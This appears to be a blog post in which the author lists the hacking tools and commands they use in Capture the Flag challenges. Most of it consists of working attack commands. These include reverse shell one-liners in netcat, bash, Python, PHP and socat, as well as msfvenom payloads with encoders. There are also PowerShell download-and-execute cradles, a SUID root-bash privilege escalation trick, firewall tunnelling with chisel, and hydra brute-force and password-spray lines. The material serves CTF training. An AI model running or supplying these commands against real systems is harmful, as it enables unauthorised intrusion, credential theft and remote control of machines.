Essential Hacking Tools for CTF Success

A curated list of my most effective and frequently used hacking tools for Capture the Flag challenges.

Content in this Blog Post

In this blog post I will discuss the hack tools I used most throughout tons of CTF’s

Hack tools I used most

Over the past six months, I have been diving into countless Capture the Flag (CTF) challenges on, a very good platform for learning about cybersecurity. CTFs are a crucial part of cybersecurity education, involving breaking into misconfigured (often outdated) systems and extracting text from a specific file to demonstrate successful access. This process is incredibly addictive and as enjoyable as playing a great video game.

A significant aspect of excelling at CTFs is mastering the tools at your disposal. At first, the sheer variety of tools can be overwhelming, making it easy to overlook some of them or forget about them. To keep track, I have been documenting all the tools and commands I frequently use, find particularly effective, or consider less obvious.

Table of contents


The most well known port scanning tool. Slow but can do it all!

sudo nmap -Ss
sudo nmap -A
sudo nmap -O -sV
sudo nmap -sV -vv
sudo nmap -sN -vvv
nmap --script ssl-enum-ciphers,ssl-heartbleed -p 443

passive recon



My go to tool for scanning ports, extremely fast. It detects open ports first, and then tries to get info about the services on those ports from nmap. This is a loud tool, i.e. it will trigger alarms when used in reality but who cares when doing CTF’s. This is just a pure joy to use.

rustscan --ulimit 5000 -r 1-65535 -a -- -A
rustscan -t 2000 --ulimit 5000 -r 1-65535 -a -- -Pn -A -sV

web enumeration

Check out the common flags I used.

gobuster -u -x "txt,php,html" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir
gobuster -u "" -x ",txt" -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt  dir --exclude-length 1763
gobuster -b '301,404' -u "" -x ",html,php" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt dir  # blacklist status codes
ffuf -X POST -d "username=USER&password=PASS" -H "Content-Type: application/x-www-form-urlencoded" -w "./usernames.txt:USER" -w "./passwords.txt:PASS" -u -fs 4478  # Set correct headers 
curl http:/ | md5sum # look up in owasp favicon database
nikto -h

subdomain enumeration

Subfinder works crazy well. Virtual hosting is good to know about.  # database to look up subdomains
./subfinder -d  # go tool subfinder
ffuf -w ./wordlist.txt -u -H "Host:" -fs <size>   # detect virtual hosting

useful wordlists for web enumeration

Very well known wordlists, these I found to be most useful for the CTF’s I encoutered.


smb enumeration

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
smbclient //
smbget -R smb://
smbclient -U milesdyson%")s{A&2Z=F^n_E.B\`" // # example of password login, note the quotes around the password -login
smbclient -W WORKGROUP -U Anonymous //
enum4linux -a
enum4linux -u milesdyson -p ')s{A&2Z=F^n_E.B`'  -a
auxiliary/scanner/smb/smb_login  # metasploit


sudo nmap -p 2049,111 --script='nfs-*' -d
showmount -e

ftp enumeration

The banner grab can also be used for other services.

sudo nmap --script ftp-* -p21
nc -nv 21  # banner grab


Incredibly useful password hash crack tool, but do a search first check if your password hash is already cracked before saves a lot of time. Checkout the subformats as well, I had to use that functionality on multiple occasions. If john can’t do it, hashcat is another good tool. I only switch to hashcat if john can’t do it.

john --list=formats
john --list=subformats
john --format=Raw-SHA512 --rules -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt
# subformat syntax
john --format=dynamic_82 --rules -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt


Sql injection is very unfun and tedious to do. sqlmap is also very loud, but for CTF’s that does not matter, saves a ton of time.

sqlmap -u --forms -a
sqlmap -u --cookie="PHPSESSID=lr3l0hnc6gm9a4clunvbgv1vt0" --forms -a
sqlmap -r request_file.txt -a       # You could copy requests from burpsuite and use them like this

GTFO bins

For Linux priv escalatio this is the stuff. For windows you can checkout lolbas.

root bash

Used this whenever possible.

cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
./rootbash -p

If you manage to get these lines executed as root you are in. I use this most often when the back up mechanism (run as root) can be manipulate. This is a very wellknown technique look it up to learn how it works.


Local copy of the exploitdb database. That can you search in the commandline, very useful.

searchsploit -w query
searchsploit -p exploitnumber

find commands

Find is always available on linux systems. I usually run these to find the low hanging fruit before going to priv escalation scripts such as linpeas. Especially for the easy CTF’s these commands can point you to the intended priv escalation vector.

find / -type f \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
find / -user your_username 2>/dev/null
find . -type f -executable -print
getcap -r / 2>/dev/null
find / -name root.txt -exec cat {} \; 2>/dev/null 

tty from reverse shell

You have a reverse shell but you want a more features. I almost always use these.

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

reverse shells

Many options for different scenario’s

nc 4444 –e /bin/sh
bash -i >& /dev/tcp/ 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"])'
php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
msfvenom -p cmd/unix/reverse_netcat lhost=[ip] lport=4444 R
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f exe -o reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST= LPORT=5555 -f exe -o reverse.exe
curl > reverse.php

reverse shells documentation


A way I like to use to transport files between machines

nc -l -p 1234 > out.file
nc -w 3 1234 < in.file


A listener for your reverse shell to connect to. I almost exclusively use nc for this.

nc -lvnp 4444
rlwrap nc -lvnp 4444


Don’t really like this tool. But it can do so much that in most scenario’s I end up using it for something and sometimes it leads to results.

hydra -l username -P /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt -t 4 ssh:// -VV
hydra -l user -P /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt -t 16 ssh:// -VV
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV ftp
hydra -l username -P /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt -V http-form-post '/login:username=^USER^&password=^PASS^:F=failed' -o hydra_results.txt
hydra -L .usernames.txt -p "passwordtospray" http-get '/:A=NTLM:F=401'    # ntlm passwordspray

image analysis

I feel like this is exclusively useful for CTF’s I cannot imagine that this is useful in real scenario’s. But more often than not stuff is hidden inside images or binaries, and these tools almost always lead to an answer. It does teach you a bit about binaries, file formats in general, meta data, so I understand why it is used so much in CTF’s.

dd if=image.jpg bs=1 skip=265845


socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0             # listener
socat OPENSSL:,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane  # reverse shell
./socat tcp-l:2222,fork,reuseaddr tcp: &  # start listener on 2222 forward to

chisel, tunnel through firewalls

Good to know this exist.

# Reverse port forward from attack box to remote, localhost:2049 will be forwarded to remote:2049
./chisel server -p 4242 --reverse  # Start reverse server that listens on 4242 on host
./chisel client server_ip:4242 R:2049:localhost:2049 &  # on remote connect back to host and reverse the connection

Start python server to share files

Use this all the time. Host your tools, curl them from the target to use them on the target.

python -m http.server 8000
sudo python -m http.server 80

hash identification

These websites I found most useful for identifying and finding already cracked hashes.


This resource has many super useful wordlists.


Very user friendly exploit framework. Especially the meterpreter is very fun to have on windows. Mostly quite staightforward to use, the things I wrote below are things I forgot sometimes.

get all exploits

in meterpreter: run post/multi/recon/local_exploit_suggester

check possible payloads when in exploit

show payloads

Try upgrading to a more capable shell

sessions -u 1  # upgrade session to meterpreter

Dump meterpreter directly on target

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe -o reverse.exe # dump payload on target
use exploit/multi/handler # listener module
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

cypher solving

CTF’s like to include cyphers, they are fun to do once, but you encounter them too often in CTF’s. Lukily I found these resources to be able to solve almost anything.       # check the auto solver  # vignere solver (use if cypher looks like it can be solved by ROT but can't and requires a key)             # runs a bunch of steganography tools on images

Connect to windows with remote desktop protocol

Good linux rdp tool

xfreerdp /u:administrator /p:letmein123! /v: /tls-seclevel:1
wlfreerdp /u:administrator /p:letmein123! /v: /tls-seclevel:1

curl on windows

Invoke-WebRequest -uri -outfile C:\\Windows\temp\socat.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','\Windows\Temp\reverse3.exe')
powershell "(New-Object System.Net.WebClient).Downloadfile('','reverse.exe')"
powershell iex (New-Object Net.WebClient).DownloadString('');Invoke-PowerShellTcp -Reverse - your-ip -Port 4444

pcap analysis

Also something that CTF’s like to do. They give you captured packet files which you have to analyse and obtain credentials from. Sometimes tedious to do. tcpick formats those files very well.

tcpick -C -yP -r mypcap.pcapng | less -r
tcpick -wR -r mypcapfile  # creates files from tcp stream

Linux privilege escalation

Binary editing with vim

Fix files that have been broken on purpose.

vim -b file
:% !xxd
:% !xxd -r


gpg --import priv.key
gpg --decrypt encrypted.file


Port forwarding examples with ssh

ssh -L 8000: user@ -fN  # Local forward, local 8000 to through
ssh -L 8000: user@ -fN # Local forward to application on target
ssh -R 8000: kali@ -i KEYFILE -fN  # Reverse connection, on attacking machine, same result as previous command
ssh -D 8000 user@target.thm -fN  # Port forward to target


msf > auxiliary/scanner/smtp/smtp_enum
msf > auxiliary/scanner/smtp/smtp_version


telnet 1234
hydra -s 12345 -l username boris -P ./wordlist.txt -f pop3 -V


msf > auxiliary/admin/mysql/mysql_sql
msf > auxiliary/scanner/mysql/mysql_schemadump 
msf > auxiliary/scanner/mysql/mysql_hashdump


This tool is amazing. Also its incredibly easy to forget how it works. The commands I find most useful.

r2 -d -AA ./program.elf
afl                 # list all functions
db main             # set breakpoints
s main              # see address
v                   # visual mode
VV                  # panel view

## in visual mode
?                       # help in visual mode
"                       # Change window type in visual mode
pxr 256@r:SP            # (press e) In the window type stack, change stackview to something sensible
: e stack.size = 512    # Increase the size of the stack
: e asm.describe = true # describe assembly
w                       # window mode, change reorder windows
HJKL                    # resize in window mode

general buffer overflow tips

Tips for trying out buffer overflows with r2  # connecting stdin to radare2 program  # connecting stdin to radare2 program           # be mindfull when fuzzing to check whether you are writing a valid address in rip


echo -n "asdasdkjhfhj==" | base64 -d